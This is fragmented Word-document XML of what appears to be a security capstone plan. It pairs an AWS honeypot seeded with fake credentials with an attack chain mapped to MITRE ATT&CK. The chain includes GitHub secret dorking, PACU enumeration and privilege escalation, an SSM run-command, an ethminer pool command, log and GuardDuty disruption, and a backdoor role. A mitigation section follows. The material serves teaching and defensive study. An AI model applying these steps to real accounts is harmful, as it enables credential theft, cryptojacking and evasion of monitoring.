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8dr7gf26b7t" w:id="0"/>
      <w:bookmarkEnd w:id="0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Codify exploitable infrastructure misconfigurations in a Terraform template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Provision an intentionally vulnerable template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Deploy a CloudFormation template to provision AWS resources to mine Ethereum (cryptomining attack)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sfcyip48wt7" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview with MITRE ATT&amp;CK Enterprise Cloud Matrix Mapping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rwsm8kerawt" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Honeypot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intentionally vulnerable HCL code in public repo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faux credentials/ honey token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Generate faux credentials </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with Canary Token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Monitor hits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GitHub comments to include a juicy keyword for GitDorker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Tesla.com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Placeholder keyword (narrowing search)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Monitor hit increase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code to replace above credentials with untracked faux credentials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Monitor hits, which indicate git log perusal, where credentials remain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AWS account has role with AssumeRole permission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j2sgg5693cia" w:id="3"/>
      <w:bookmarkEnd w:id="3"/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Credential Access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  <w:t xml:space="preserve">Reconnaissance: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Unsecured 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potential secrets with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GitDorker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keyword ‘Tesla.com’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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live demo, narrow search </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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keyword search parameters: posomielmiel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019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–flag access_key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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PATs for parallel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B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Dorks file: Access_key and secret_key (must add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">latter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to file)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 spreadsheet results in ‘access_key’ column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Sort columns by ‘NUMBER OF RESULTS’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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Result includes link to successful search query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="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Link shows codes snippets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 keys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GitHub API for code snippet results or link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Alternate: get repo link and parse it with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TruffleHog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 access_key to CSV file</w:t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TruffleHog only finds access_key, not secret_key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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secret_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in repo git log 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Clone repo locally</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">? – regex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Original key is in same commit as one prior to access_key edit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Regex to read access_key in TruffleHog results, secret_key value and append to a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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9"/>
        </w:numPr>
        <w:ind w:left="216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JSON output available</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –json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Regex text after secret_key = (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C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.strip() spaces in (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D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Write regex to say spaces are optional</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E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Parse relevant commit: [commit_ID]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credentials for with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Boto3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Try/ except sts get-caller-identity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in ‘access_key’ and ‘secret_key’ values and loop through each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May append to ~/.aws/credentials</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and switch between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includes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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 (number) </w:t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UserID (access_key)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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ARN: includes access_key, user/ role name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr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Initial Access</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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Valid accounts</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/ Intrusion/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Exploitation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, Elevation, Stealth, Exfiltration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Discovery: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Account discovery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PACU</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with valid AWS credentials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keys (import_keys –all) or import_keys &lt;ALIAS&gt;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Enumerate IAM roles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iam__enum_users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Discovery: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Cloud service discovery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Find buckets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aws s3 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Discovery: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Permission Group Discovery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Enumerate permissions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Run</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iam__enum_permissions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Gives username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iam__bruteforce_permissions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Gives services and comprehensive permission  list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iam__enum_users_roles_policies_groups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Privilege Escalation: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Valid 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Escalate privileges with AssumeRole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Run</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iam__privesc_scan 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Create role that is lower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Discovery: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Run </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:shd w:fill="d9d2e9" w:val="clear"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Checkov</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:shd w:fill="d9d2e9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to audit deployment?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Describe stack programmatically to determine whether or not to do so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="216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Get stacks: aws cloudformation describe-stacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="216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See resources: aws cloudformation list-stack-resources --stack-name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shd w:fill="d9d2e9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:shd w:fill="d9d2e9" w:val="clear"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Terraform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Deface S3 site?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Upload template to S3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aws s3 cp folderpath/ s3://mybucket/path –recursive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Have GetObject, PutObject, PutBucketNotification, and GetBucketNotification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Impact: </w:t>
      </w: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Resource hijacking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Cloudformation cryptominer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for two minutes ^ ^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parameters pointing to eth mining address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mining progress on an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ETH dashboard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Run exploit in free tier sandbox AWS account with capacity limits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ind w:left="216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Add second profile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to aws config</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B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Allow AssumeRole on a role </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C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Include in TF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D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Codify a non-admin role to escalate privileges from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ind w:left="216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Deploy template in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aws cloudformation deploy --template-file template.yaml --stack-name static-website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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OR –template-file s3://mybucket/template.yml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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 stack resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062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aws cloudformation list-stacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063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aws cloudformation describe-stacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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increase resource quotas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do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programmatically</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, if SM is allowed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="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Alternate: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get console access via API keys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 scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sh_command_id=$(aws ssm send-command \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --instance-ids "instance-ID" \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --document-name "AWS-RunShellScript" \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --comment "Demo run shell script on Linux Instances" \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --parameters '{"commands":["#!/usr/bin/python","print \"Hello World from python\""]}' \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --output text \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --query "Command.CommandId") sh -c 'aws ssm list-command-invocations \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --command-id "$sh_command_id" \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --details \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}"'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ethminer -P stratums://0x99b36B[...]ECac2c15@us2.ethermine.org:5555</w:t>
        <w:tab/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Defense Evasion: </w:t>
      </w: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Modify cloud compute infrastructure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Destroy stack programmatically</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">aws cloudformation delete-stack --stack-name myteststack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Defense Evasion: </w:t>
      </w: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Hide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PACU</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with valid AWS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Swap keys to exploited AWS account with account limits PACU swap_keys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Clean logs after running exploits</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> detection_disruption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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CloudTrail, CloudWatch alarms, AWS Config, VPC flow logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Disables, deletes or minimizes logs/ monitoring services, disable SNS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Takes credentials from ~/.aws/credentials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Read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Verify stack is down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E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Generate a URL to sign into the AWS console PACU console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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logs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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services&gt; data s3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Commands: ~/.local/share/pacu/infosec_capstone/cmd_log.txt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ind w:left="144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Avoid GuardDuty detection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> guardduty_whitelist_ip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TBD: </w:t>
      </w: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Persistence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Create assume-role cross-account trust relationships</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Iam__backdor_assume_role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29s9ykjqma7e" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation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Threagile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threat model in mark-up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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8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and abuse cases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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flows and trust boundaries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8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What are you protecting?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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What can go wrong? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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What are you going to do about it? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Did you do a good job?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9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Replicable threat modeling tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Leverages OWASP ASVS, MITRE CWEs and Threagile’s custom risk qualifications: RAA, DLP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Checkov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rules to filter results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KICS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Revert to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safer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clone again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Configuration management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Ansible, Puppet, etc.. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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AWS Config Manager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Guard Duty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IAM credentials with MFA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nbbbhlo2g5f8" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Future Iterations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Find tool to visualize templates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ind w:left="144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CFN to HCL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ind w:left="144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HCL to CFN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CloudFormation template to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AWS CloudFormation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Qualify risk</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Verizon db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YAML to JSON to parse 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RhinoSecurityLabs/pacu/wiki/Session-Logs-and-Output" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dagrz/aws_pwn" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#guardduty__whitelist_ip" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Threagile/threagile" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#iam__backdoor_assume_role" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Smartbrood/terraform-aws-s3-bucket" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Checkmarx/ki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bheda12/GitDorker" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://deliveroo.engineering/2020/01/02/CloudFormation-To-Terraform.html" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/47065279/convert-terraform-templates-to-cloudformation-templat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anarytokens.org/generate#" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://canarytokens.org/history?token=nkt34i7mm5ssv8vdwav547ype&amp;auth=58ea8600ea467c81ac8cea24f658bb59" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-cli-creating-stack.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-profiles.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/systems-manager/latest/userguide/walkthrough-cli.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mludvig/aws-ethereum-miner#increase-resource-quotas" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md#aws---gaining-aws-console-access-via-api-keys" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-cli-deleting-stack.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#detection__disruption" TargetMode="External"/><Relationship Id="rId38" 